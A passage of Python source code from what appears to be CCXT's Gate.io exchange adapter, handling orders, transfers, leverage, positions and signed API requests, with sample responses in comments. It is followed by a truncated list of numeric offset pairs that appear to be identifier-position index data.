timestamp = self.safe_integer(order, 'create_time_ms')
if timestamp is None:
timestamp = self.safe_timestamp_2(order, 'create_time', 'ctime')
lastTradeTimestamp = self.safe_integer(order, 'update_time_ms')
if lastTradeTimestamp is None:
lastTradeTimestamp = self.safe_timestamp_2(order, 'update_time', 'finish_time')
exchangeSymbol = self.safe_string_2(order, 'currency_pair', 'market', contract)
# Everything below self(above return) is related to fees
fees = []
gtFee = self.safe_string(order, 'gt_fee')
if gtFee:
fees.append({
'currency': 'GT',
'cost': gtFee,
})
fee = self.safe_string(order, 'fee')
if fee:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'fee_currency')),
'cost': fee,
})
rebate = self.safe_string(order, 'rebated_fee')
if rebate:
fees.append({
'currency': self.safe_currency_code(self.safe_string(order, 'rebated_fee_currency')),
'cost': Precise.string_neg(rebate),
})
numFeeCurrencies = len(fees)
multipleFeeCurrencies = numFeeCurrencies > 1
status = self.parse_order_status(rawStatus)
return self.safe_order({
'id': self.safe_string(order, 'id'),
'clientOrderId': self.safe_string(order, 'text'),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': lastTradeTimestamp,
'status': status,
'symbol': self.safe_symbol(exchangeSymbol),
'type': type,
'timeInForce': timeInForce,
'postOnly': postOnly,
'side': side,
'price': self.parse_number(price),
'stopPrice': self.safe_number(trigger, 'price'),
'average': average,
'amount': self.parse_number(Precise.string_abs(amount)),
'cost': Precise.string_abs(cost),
'filled': self.parse_number(Precise.string_abs(filled)),
'remaining': self.parse_number(Precise.string_abs(remaining)),
'fee': None if multipleFeeCurrencies else self.safe_value(fees, 0),
'fees': fees if multipleFeeCurrencies else [],
'trades': None,
'info': order,
}, market)
async def create_reduce_only_order(self, symbol, type, side, amount, price=None, params={}):
request = {
'reduceOnly': True,
}
return await self.create_order(symbol, type, side, amount, price, self.extend(request, params))
async def fetch_order(self, id, symbol=None, params={}):
"""
Retrieves information on an order
:param str id: Order id
:param str symbol: Unified market symbol, *required for spot and margin*
:param dict params: Parameters specified by the exchange api
:param bool params['stop']: True if the order being fetched is a trigger order
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:param str params['type']: 'spot', 'swap', or 'future', if not provided self.options['defaultMarginMode'] is used
:param str params['settle']: 'btc' or 'usdt' - settle currency for perpetual swap and future - market settle currency is used if symbol is not None, default="usdt" for swap and "btc" for future
:returns: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
stop = self.safe_value_2(params, 'is_stop_order', 'stop', False)
params = self.omit(params, ['is_stop_order', 'stop'])
clientOrderId = self.safe_string_2(params, 'text', 'clientOrderId')
orderId = id
if clientOrderId is not None:
params = self.omit(params, ['text', 'clientOrderId'])
if clientOrderId[0] != 't':
clientOrderId = 't-' + clientOrderId
orderId = clientOrderId
market = None if (symbol is None) else self.market(symbol)
type, query = self.handle_market_type_and_params('fetchOrder', market, params)
contract = (type == 'swap') or (type == 'future')
request, requestParams = self.prepare_request(market, type, query) if contract else self.spot_order_prepare_request(market, stop, query)
request['order_id'] = orderId
methodMiddle = 'PriceOrders' if stop else 'Orders'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGet' + methodMiddle + 'OrderId',
'margin': 'privateSpotGet' + methodMiddle + 'OrderId',
'swap': 'privateFuturesGetSettle' + methodMiddle + 'OrderId',
'future': 'privateDeliveryGetSettle' + methodMiddle + 'OrderId',
})
response = await getattr(self, method)(self.extend(request, requestParams))
return self.parse_order(response, market)
async def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetches all open orders
:param str symbol: Unified market symbol
:param int since: earliest time in ms for orders in the response
:param int limit: max number of order structures to return
:param dict params: exchange specific params
:param bool params['stop']: True for fetching stop orders
:param str params['type']: spot, margin, swap or future, if not provided self.options['defaultType'] is used
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for type='margin', if not provided self.options['defaultMarginMode'] is used
:returns: An array of order structures
"""
return await self.fetch_orders_by_status('open', symbol, since, limit, params)
async def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetches all closed orders
:param str symbol: Unified market symbol of the market to fetch orders for
:param int since: earliest time in ms for orders in the response
:param int limit: max number of order structures to return
:param dict params: exchange specific params
:param bool params['stop']: True for fetching stop orders
:param str params['type']: spot, swap or future, if not provided self.options['defaultType'] is used
:param str params['marginMode']: 'cross' or 'isolated' - marginMode for margin trading if not provided self.options['defaultMarginMode'] is used
:returns: An array of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
return await self.fetch_orders_by_status('finished', symbol, since, limit, params)
async def fetch_orders_by_status(self, status, symbol=None, since=None, limit=None, params={}):
await self.load_markets()
market = None if (symbol is None) else self.market(symbol)
stop = self.safe_value(params, 'stop')
params = self.omit(params, 'stop')
type, query = self.handle_market_type_and_params('fetchOrdersByStatus', market, params)
spot = (type == 'spot') or (type == 'margin')
request, requestParams = self.multi_order_spot_prepare_request(market, stop, query) if spot else self.prepare_request(market, type, query)
if status == 'closed':
status = 'finished'
request['status'] = status
if limit is not None:
request['limit'] = limit
if since is not None and spot:
request['from'] = int(since / 1000)
methodTail = 'PriceOrders' if stop else 'Orders'
openSpotOrders = spot and (status == 'open') and not stop
if openSpotOrders:
methodTail = 'OpenOrders'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotGet' + methodTail,
'margin': 'privateSpotGet' + methodTail,
'swap': 'privateFuturesGetSettle' + methodTail,
'future': 'privateDeliveryGetSettle' + methodTail,
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# SPOT Open Orders
#
# [
# {
# "currency_pair": "ADA_USDT",
# "total": 2,
# "orders": [
# {
# "id": "155498539874",
# "text": "apiv4",
# "create_time": "1652406843",
# "update_time": "1652406843",
# "create_time_ms": 1652406843295,
# "update_time_ms": 1652406843295,
# "status": "open",
# "currency_pair": "ADA_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "3",
# "price": "0.35",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "3",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "ADA",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# },
# ...
# ]
# },
# ...
# ]
#
# SPOT
#
# [
# {
# "id": "8834234273",
# "text": "3",
# "create_time": "1635406193",
# "update_time": "1635406193",
# "create_time_ms": 1635406193361,
# "update_time_ms": 1635406193361,
# "status": "closed",
# "currency_pair": "BTC_USDT",
# "type": "limit",
# "account": "spot", # margin for margin orders
# "side": "sell",
# "amount": "0.0002",
# "price": "58904.01",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.0000",
# "fill_price": "11.790516",
# "filled_total": "11.790516",
# "fee": "0.023581032",
# "fee_currency": "USDT",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee_currency": "BTC"
# }
# ]
#
# Spot Stop
#
# [
# {
# "market": "ADA_USDT",
# "user": 10406147,
# "trigger": {
# "price": "0.65",
# "rule": "\u003c=",
# "expiration": 86400
# },
# "put": {
# "type": "limit",
# "side": "sell",
# "price": "0.65",
# "amount": "2.00000000000000000000",
# "account": "normal", # margin for margin orders
# "time_in_force": "gtc"
# },
# "id": 8449909,
# "ctime": 1652188982,
# "status": "open"
# }
# ]
#
# Perpetual Swap
#
# [
# {
# "status": "finished",
# "size": -1,
# "left": 0,
# "id": 82750739203,
# "is_liq": False,
# "is_close": False,
# "contract": "BTC_USDT",
# "text": "web",
# "fill_price": "60721.3",
# "finish_as": "filled",
# "iceberg": 0,
# "tif": "ioc",
# "is_reduce_only": True,
# "create_time": 1635403475.412,
# "finish_time": 1635403475.4127,
# "price": "0"
# }
# ]
#
result = response
if openSpotOrders:
result = []
for i in range(0, len(response)):
orders = self.safe_value(response[i], 'orders')
result = self.array_concat(result, orders)
orders = self.parse_orders(result, market, since, limit)
return self.filter_by_symbol_since_limit(orders, symbol, since, limit)
async def cancel_order(self, id, symbol=None, params={}):
"""
Cancels an open order
:param str id: Order id
:param str symbol: Unified market symbol
:param dict params: Parameters specified by the exchange api
:param bool params['stop']: True if the order to be cancelled is a trigger order
:returns: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
await self.load_markets()
market = None if (symbol is None) else self.market(symbol)
stop = self.safe_value_2(params, 'is_stop_order', 'stop', False)
params = self.omit(params, ['is_stop_order', 'stop'])
type, query = self.handle_market_type_and_params('cancelOrder', market, params)
request, requestParams = self.spot_order_prepare_request(market, stop, query) if (type == 'spot' or type == 'margin') else self.prepare_request(market, type, query)
request['order_id'] = id
pathMiddle = 'Price' if stop else ''
method = self.get_supported_mapping(type, {
'spot': 'privateSpotDelete' + pathMiddle + 'OrdersOrderId',
'margin': 'privateSpotDelete' + pathMiddle + 'OrdersOrderId',
'swap': 'privateFuturesDeleteSettle' + pathMiddle + 'OrdersOrderId',
'future': 'privateDeliveryDeleteSettle' + pathMiddle + 'OrdersOrderId',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# spot
#
# {
# "id": "95282841887",
# "text": "apiv4",
# "create_time": "1637383156",
# "update_time": "1637383235",
# "create_time_ms": 1637383156017,
# "update_time_ms": 1637383235085,
# "status": "cancelled",
# "currency_pair": "ETH_USDT",
# "type": "limit",
# "account": "spot",
# "side": "buy",
# "amount": "0.01",
# "price": "3500",
# "time_in_force": "gtc",
# "iceberg": "0",
# "left": "0.01",
# "fill_price": "0",
# "filled_total": "0",
# "fee": "0",
# "fee_currency": "ETH",
# "point_fee": "0",
# "gt_fee": "0",
# "gt_discount": False,
# "rebated_fee": "0",
# "rebated_fee_currency": "USDT"
# }
#
# spot conditional
#
# {
# "market": "ETH_USDT",
# "user": 2436035,
# "trigger": {
# "price": "3500",
# "rule": "\u003c=",
# "expiration": 86400
# },
# "put": {
# "type": "limit",
# "side": "buy",
# "price": "3500",
# "amount": "0.01000000000000000000",
# "account": "normal",
# "time_in_force": "gtc"
# },
# "id": 5891843,
# "ctime": 1637382379,
# "ftime": 1637382673,
# "status": "canceled"
# }
#
# perpetual swaps
#
# {
# id: "82241928192",
# contract: "BTC_USDT",
# mkfr: "0",
# tkfr: "0.0005",
# tif: "gtc",
# is_reduce_only: False,
# create_time: "1635196145.06",
# finish_time: "1635196233.396",
# price: "61000",
# size: "4",
# refr: "0",
# left: "4",
# text: "web",
# fill_price: "0",
# user: "6693577",
# finish_as: "cancelled",
# status: "finished",
# is_liq: False,
# refu: "0",
# is_close: False,
# iceberg: "0",
# }
#
return self.parse_order(response, market)
async def cancel_all_orders(self, symbol=None, params={}):
await self.load_markets()
market = None if (symbol is None) else self.market(symbol)
stop = self.safe_value(params, 'stop')
params = self.omit(params, 'stop')
type, query = self.handle_market_type_and_params('cancelAllOrders', market, params)
request, requestParams = self.multi_order_spot_prepare_request(market, stop, query) if (type == 'spot') else self.prepare_request(market, type, query)
methodTail = 'PriceOrders' if stop else 'Orders'
method = self.get_supported_mapping(type, {
'spot': 'privateSpotDelete' + methodTail,
'margin': 'privateSpotDelete' + methodTail,
'swap': 'privateFuturesDeleteSettle' + methodTail,
'future': 'privateDeliveryDeleteSettle' + methodTail,
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# [
# {
# "id": 139797004085,
# "contract": "ADA_USDT",
# "mkfr": "0",
# "tkfr": "0.0005",
# "tif": "gtc",
# "is_reduce_only": False,
# "create_time": 1647911169.343,
# "finish_time": 1647911226.849,
# "price": "0.8",
# "size": 1,
# "refr": "0.3",
# "left": 1,
# "text": "api",
# "fill_price": "0",
# "user": 6693577,
# "finish_as": "cancelled",
# "status": "finished",
# "is_liq": False,
# "refu": 2436035,
# "is_close": False,
# "iceberg": 0
# }
# ...
# ]
#
return self.parse_orders(response, market)
async def transfer(self, code, amount, fromAccount, toAccount, params={}):
"""
makes internal transfers of funds between accounts on the same exchange
:param str code: unified currency code for currency being transferred
:param float amount: the amount of currency to transfer
:param str fromAccount: the account to transfer currency from
:param str toAccount: the account to transfer currency to
:param dict params: Exchange specific parameters
:param dict params['symbol']: Unified market symbol *required for type == margin*
:returns: A `transfer structure <https://docs.ccxt.com/en/latest/manual.html#transfer-structure>`
"""
await self.load_markets()
currency = self.currency(code)
fromId = self.parse_account(fromAccount)
toId = self.parse_account(toAccount)
truncated = self.currency_to_precision(code, amount)
request = {
'currency': currency['id'],
'amount': truncated,
}
if not (fromId in self.options['accountsByType']):
request['from'] = 'margin'
request['currency_pair'] = fromId
else:
request['from'] = fromId
if not (toId in self.options['accountsByType']):
request['to'] = 'margin'
request['currency_pair'] = toId
else:
request['to'] = toId
if fromId == 'margin' or toId == 'margin':
symbol = self.safe_string_2(params, 'symbol', 'currency_pair')
if symbol is None:
raise ArgumentsRequired(self.id + ' transfer requires params["symbol"] for isolated margin transfers')
market = self.market(symbol)
request['currency_pair'] = market['id']
params = self.omit(params, 'symbol')
if (toId == 'futures') or (toId == 'delivery') or (fromId == 'futures') or (fromId == 'delivery'):
request['settle'] = currency['lowerCaseId']
response = await self.privateWalletPostTransfers(self.extend(request, params))
#
# according to the docs(however actual response seems to be an empty string '')
#
# {
# "currency": "BTC",
# "from": "spot",
# "to": "margin",
# "amount": "1",
# "currency_pair": "BTC_USDT"
# }
#
transfer = self.parse_transfer(response, currency)
return self.extend(transfer, {
'fromAccount': fromAccount,
'toAccount': toAccount,
'amount': self.parse_number(truncated),
})
def parse_account(self, account):
accountsByType = self.options['accountsByType']
if account in accountsByType:
return accountsByType[account]
elif account in self.markets:
market = self.market(account)
return market['id']
else:
keys = list(accountsByType.keys())
raise ExchangeError(self.id + ' accounts must be one of ' + ', '.join(keys) + ' or an isolated margin symbol')
def parse_transfer(self, transfer, currency=None):
timestamp = self.milliseconds()
return {
'id': None,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'currency': self.safe_currency_code(None, currency),
'amount': None,
'fromAccount': None,
'toAccount': None,
'status': None,
'info': transfer,
}
async def set_leverage(self, leverage, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' setLeverage() requires a symbol argument')
# WARNING: THIS WILL INCREASE LIQUIDATION PRICE FOR OPEN ISOLATED LONG POSITIONS
# AND DECREASE LIQUIDATION PRICE FOR OPEN ISOLATED SHORT POSITIONS
if (leverage < 0) or (leverage > 100):
raise BadRequest(self.id + ' setLeverage() leverage should be between 1 and 100')
await self.load_markets()
market = self.market(symbol)
method = self.get_supported_mapping(market['type'], {
'swap': 'privateFuturesPostSettlePositionsContractLeverage',
'future': 'privateDeliveryPostSettlePositionsContractLeverage',
})
request, query = self.prepare_request(market, None, params)
defaultMarginMode = self.safe_string_2(self.options, 'marginMode', 'defaultMarginMode')
crossLeverageLimit = self.safe_string(query, 'cross_leverage_limit')
marginMode = self.safe_string(query, 'marginMode', defaultMarginMode)
if crossLeverageLimit is not None:
marginMode = 'cross'
leverage = crossLeverageLimit
if marginMode == 'cross' or marginMode == 'cross_margin':
request['query'] = {
'cross_leverage_limit': str(leverage),
'leverage': '0',
}
else:
request['query'] = {
'leverage': str(leverage),
}
response = await getattr(self, method)(self.extend(request, query))
#
# {
# "value": "0",
# "leverage": "5",
# "mode": "single",
# "realised_point": "0",
# "contract": "BTC_USDT",
# "entry_price": "0",
# "mark_price": "62035.86",
# "history_point": "0",
# "realised_pnl": "0",
# "close_order": null,
# "size": 0,
# "cross_leverage_limit": "0",
# "pending_orders": 0,
# "adl_ranking": 6,
# "maintenance_rate": "0.005",
# "unrealised_pnl": "0",
# "user": 2436035,
# "leverage_max": "100",
# "history_pnl": "0",
# "risk_limit": "1000000",
# "margin": "0",
# "last_close_pnl": "0",
# "liq_price": "0"
# }
#
return response
def parse_position(self, position, market=None):
#
# {
# value: "12.475572",
# leverage: "0",
# mode: "single",
# realised_point: "0",
# contract: "BTC_USDT",
# entry_price: "62422.6",
# mark_price: "62377.86",
# history_point: "0",
# realised_pnl: "-0.00624226",
# close_order: null,
# size: "2",
# cross_leverage_limit: "25",
# pending_orders: "0",
# adl_ranking: "5",
# maintenance_rate: "0.005",
# unrealised_pnl: "-0.008948",
# user: "663337",
# leverage_max: "100",
# history_pnl: "14.98868396636",
# risk_limit: "1000000",
# margin: "0.740721495056",
# last_close_pnl: "-0.041996015",
# liq_price: "59058.58"
# }
#
contract = self.safe_string(position, 'contract')
market = self.safe_market(contract, market)
size = self.safe_string(position, 'size')
side = None
if Precise.string_gt(size, '0'):
side = 'long'
elif Precise.string_lt(size, '0'):
side = 'short'
maintenanceRate = self.safe_string(position, 'maintenance_rate')
notional = self.safe_string(position, 'value')
leverage = self.safe_string(position, 'leverage')
marginMode = None
if leverage == '0':
marginMode = 'cross'
else:
marginMode = 'isolated'
unrealisedPnl = self.safe_string(position, 'unrealised_pnl')
# Initial Position Margin = ( Position Value / Leverage ) + Close Position Fee
# *The default leverage under the full position is the highest leverage in the market.
# *Trading fee is charged as Taker Fee Rate(0.075%).
takerFee = '0.00075'
feePaid = Precise.string_mul(takerFee, notional)
initialMarginString = Precise.string_add(Precise.string_div(notional, leverage), feePaid)
percentage = Precise.string_mul(Precise.string_div(unrealisedPnl, initialMarginString), '100')
return {
'info': position,
'symbol': self.safe_string(market, 'symbol'),
'timestamp': None,
'datetime': None,
'initialMargin': self.parse_number(initialMarginString),
'initialMarginPercentage': self.parse_number(Precise.string_div(initialMarginString, notional)),
'maintenanceMargin': self.parse_number(Precise.string_mul(maintenanceRate, notional)),
'maintenanceMarginPercentage': self.parse_number(maintenanceRate),
'entryPrice': self.safe_number(position, 'entry_price'),
'notional': self.parse_number(notional),
'leverage': self.safe_number(position, 'leverage'),
'unrealizedPnl': self.parse_number(unrealisedPnl),
'contracts': self.parse_number(Precise.string_abs(size)),
'contractSize': self.safe_value(market, 'contractSize'),
# 'realisedPnl': position['realised_pnl'],
'marginRatio': None,
'liquidationPrice': self.safe_number(position, 'liq_price'),
'markPrice': self.safe_number(position, 'mark_price'),
'collateral': self.safe_number(position, 'margin'),
'marginMode': marginMode,
'marginType': marginMode, # deprecated
'side': side,
'percentage': self.parse_number(percentage),
}
def parse_positions(self, positions):
result = []
for i in range(0, len(positions)):
result.append(self.parse_position(positions[i]))
return result
async def fetch_positions(self, symbols=None, params={}):
"""
Fetch trades positions
* @param {[str]} symbols Not used by Gateio, but parsed internally by CCXT
:param dict params: exchange specific parameters
:param str params['settle']: 'btc' or 'usdt' - settle currency for perpetual swap and future - default="usdt" for swap and "btc" for future
:param str params['type']: swap or future, if not provided self.options['defaultType'] is used
:returns: An array of `position structures <https://docs.ccxt.com/en/latest/manual.html#position-structure>`
"""
await self.load_markets()
type, query = self.handle_market_type_and_params('fetchPositions', None, params)
request, requestParams = self.prepare_request(None, type, query)
method = self.get_supported_mapping(type, {
'swap': 'privateFuturesGetSettlePositions',
'future': 'privateDeliveryGetSettlePositions',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# [
# {
# value: "12.475572",
# leverage: "0",
# mode: "single",
# realised_point: "0",
# contract: "BTC_USDT",
# entry_price: "62422.6",
# mark_price: "62377.86",
# history_point: "0",
# realised_pnl: "-0.00624226",
# close_order: null,
# size: "2",
# cross_leverage_limit: "25",
# pending_orders: "0",
# adl_ranking: "5",
# maintenance_rate: "0.005",
# unrealised_pnl: "-0.008948",
# user: "6693577",
# leverage_max: "100",
# history_pnl: "14.98868396636",
# risk_limit: "1000000",
# margin: "0.740721495056",
# last_close_pnl: "-0.041996015",
# liq_price: "59058.58"
# }
# ]
#
result = self.parse_positions(response)
return self.filter_by_array(result, 'symbol', symbols, False)
async def fetch_leverage_tiers(self, symbols=None, params={}):
await self.load_markets()
type, query = self.handle_market_type_and_params('fetchLeverageTiers', None, params)
request, requestParams = self.prepare_request(None, type, query)
if type != 'future' and type != 'swap':
raise BadRequest(self.id + ' fetchLeverageTiers only supports swap and future')
method = self.get_supported_mapping(type, {
'swap': 'publicFuturesGetSettleContracts',
'future': 'publicDeliveryGetSettleContracts',
})
response = await getattr(self, method)(self.extend(request, requestParams))
#
# Perpetual swap
#
# [
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
# ]
#
# Delivery Futures
#
# [
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
# ]
#
return self.parse_leverage_tiers(response, symbols, 'name')
def parse_market_leverage_tiers(self, info, market=None):
"""
* @ignore
https://www.gate.io/help/futures/perpetual/22162/instrctions-of-risk-limit
:param dict info: Exchange market response for 1 market
:param dict market: CCXT market
"""
#
# Perpetual swap
#
# {
# "name": "BTC_USDT",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "ref_discount_rate": "0",
# "order_price_deviate": "0.5",
# "maintenance_rate": "0.005",
# "mark_type": "index",
# "last_price": "38026",
# "mark_price": "37985.6",
# "index_price": "37954.92",
# "funding_rate_indicative": "0.000219",
# "mark_price_round": "0.01",
# "funding_offset": 0,
# "in_delisting": False,
# "risk_limit_base": "1000000",
# "interest_rate": "0.0003",
# "order_price_round": "0.1",
# "order_size_min": 1,
# "ref_rebate_rate": "0.2",
# "funding_interval": 28800,
# "risk_limit_step": "1000000",
# "leverage_min": "1",
# "leverage_max": "100",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "funding_rate": "0.002053",
# "order_size_max": 1000000,
# "funding_next_apply": 1610035200,
# "short_users": 977,
# "config_change_time": 1609899548,
# "trade_size": 28530850594,
# "position_size": 5223816,
# "long_users": 455,
# "funding_impact_value": "60000",
# "orders_limit": 50,
# "trade_id": 10851092,
# "orderbook_id": 2129638396
# }
#
# Delivery Futures
#
# {
# "name": "BTC_USDT_20200814",
# "underlying": "BTC_USDT",
# "cycle": "WEEKLY",
# "type": "direct",
# "quanto_multiplier": "0.0001",
# "mark_type": "index",
# "last_price": "9017",
# "mark_price": "9019",
# "index_price": "9005.3",
# "basis_rate": "0.185095",
# "basis_value": "13.7",
# "basis_impact_value": "100000",
# "settle_price": "0",
# "settle_price_interval": 60,
# "settle_price_duration": 1800,
# "settle_fee_rate": "0.0015",
# "expire_time": 1593763200,
# "order_price_round": "0.1",
# "mark_price_round": "0.1",
# "leverage_min": "1",
# "leverage_max": "100",
# "maintenance_rate": "1000000",
# "risk_limit_base": "140.726652109199",
# "risk_limit_step": "1000000",
# "risk_limit_max": "8000000",
# "maker_fee_rate": "-0.00025",
# "taker_fee_rate": "0.00075",
# "ref_discount_rate": "0",
# "ref_rebate_rate": "0.2",
# "order_price_deviate": "0.5",
# "order_size_min": 1,
# "order_size_max": 1000000,
# "orders_limit": 50,
# "orderbook_id": 63,
# "trade_id": 26,
# "trade_size": 435,
# "position_size": 130,
# "config_change_time": 1593158867,
# "in_delisting": False
# }
#
maintenanceMarginUnit = self.safe_string(info, 'maintenance_rate') # '0.005',
leverageMax = self.safe_string(info, 'leverage_max') # '100',
riskLimitStep = self.safe_string(info, 'risk_limit_step') # '1000000',
riskLimitMax = self.safe_string(info, 'risk_limit_max') # '16000000',
initialMarginUnit = Precise.string_div('1', leverageMax)
maintenanceMarginRate = maintenanceMarginUnit
initialMarginRatio = initialMarginUnit
floor = '0'
tiers = []
while(Precise.string_lt(floor, riskLimitMax)):
cap = Precise.string_add(floor, riskLimitStep)
tiers.append({
'tier': self.parse_number(Precise.string_div(cap, riskLimitStep)),
'currency': self.safe_string(market, 'settle'),
'minNotional': self.parse_number(floor),
'maxNotional': self.parse_number(cap),
'maintenanceMarginRate': self.parse_number(maintenanceMarginRate),
'maxLeverage': self.parse_number(Precise.string_div('1', initialMarginRatio)),
'info': info,
})
maintenanceMarginRate = Precise.string_add(maintenanceMarginRate, maintenanceMarginUnit)
initialMarginRatio = Precise.string_add(initialMarginRatio, initialMarginUnit)
floor = cap
return tiers
def sign(self, path, api=[], method='GET', params={}, headers=None, body=None):
authentication = api[0] # public, private
type = api[1] # spot, margin, future, delivery
query = self.omit(params, self.extract_params(path))
path = self.implode_params(path, params)
endPart = '' if (path == '') else ('/' + path)
entirePath = '/' + type + endPart
url = self.urls['api'][authentication][type]
if url is None:
raise NotSupported(self.id + ' does not have a testnet for the ' + type + ' market type.')
url += entirePath
if authentication == 'public':
if query:
url += '?' + self.urlencode(query)
else:
queryString = ''
if (method == 'GET') or (method == 'DELETE'):
if query:
queryString = self.urlencode(query)
url += '?' + queryString
else:
urlQueryParams = self.safe_value(query, 'query', {})
if urlQueryParams:
queryString = self.urlencode(urlQueryParams)
url += '?' + queryString
query = self.omit(query, 'query')
body = self.json(query)
bodyPayload = '' if (body is None) else body
bodySignature = self.hash(self.encode(bodyPayload), 'sha512')
timestamp = self.seconds()
timestampString = str(timestamp)
signaturePath = '/api/' + self.version + entirePath
payloadArray = [method.upper(), signaturePath, queryString, bodySignature, timestampString]
# eslint-disable-next-line quotes
payload = "\n".join(payloadArray)
signature = self.hmac(self.encode(payload), self.encode(self.secret), hashlib.sha512)
headers = {
'KEY': self.apiKey,
'Timestamp': timestampString,
'SIGN': signature,
'Content-Type': 'application/json',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return
#
# {"label": "ORDER_NOT_FOUND", "message": "Order not found"}
# {"label": "INVALID_PARAM_VALUE", "message": "invalid argument: status"}
# {"label": "INVALID_PARAM_VALUE", "message": "invalid argument: Trigger.rule"}
# {"label": "INVALID_PARAM_VALUE", "message": "invalid argument: trigger.expiration invalid range"}
# {"label": "INVALID_ARGUMENT", "detail": "invalid size"}
#
label = self.safe_string(response, 'label')
if label is not None:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], label, feedback)
raise ExchangeError(feedback)
| [
[
[
226,
234
],
[
984,
992
]
],
[
[
242,
249
],
[
173881,
173888
]
],
[
[
279,
292
],
[
26805,
26818
],
[
27390,
27403
],
[
27513,
27526
],
[
27574,
27587
],
[
27639,
27652
],
[
27764,
27777
],
[
27830,
27843
],
[
27885,
27898
],
[
27996,
28009
],
[
28121,
28134
],
[
28190,
28203
],
[
28411,
28424
],
[
29200,
29213
],
[
29252,
29265
],
[
29300,
29313
],
[
29353,
29366
],
[
29582,
29595
],
[
29756,
29769
],
[
29867,
29880
],
[
30154,
30167
],
[
30207,
30220
],
[
30267,
30280
],
[
30329,
30342
],
[
30385,
30398
],
[
30491,
30504
],
[
30553,
30566
],
[
30611,
30624
],
[
30668,
30681
],
[
31117,
31130
],
[
31345,
31358
],
[
31991,
32004
],
[
153027,
153040
],
[
175027,
175040
]
],
[
[
322,
341
],
[
26863,
26882
],
[
26919,
26938
],
[
26976,
26995
],
[
27089,
27108
],
[
27157,
27176
],
[
27217,
27236
]
],
[
[
371,
387
],
[
27030,
27046
],
[
27327,
27343
]
],
[
[
417,
434
],
[
29694,
29711
]
],
[
[
464,
480
],
[
27276,
27292
],
[
27447,
27463
]
],
[
[
510,
527
],
[
26546,
26563
],
[
52680,
52697
],
[
91937,
91954
],
[
114558,
114575
],
[
151607,
151624
],
[
153693,
153710
]
],
[
[
557,
567
],
[
26328,
26338
],
[
26380,
26390
],
[
26432,
26442
],
[
26488,
26498
],
[
26600,
26610
],
[
26656,
26666
],
[
26706,
26716
],
[
26760,
26770
],
[
55265,
55275
],
[
118325,
118335
],
[
153995,
154005
],
[
162650,
162660
]
],
[
[
597,
606
],
[
28300,
28309
],
[
28356,
28365
],
[
29813,
29822
],
[
57968,
57977
],
[
92142,
92151
]
],
[
[
636,
653
],
[
27704,
27721
],
[
28740,
28757
],
[
28866,
28883
],
[
29637,
29654
],
[
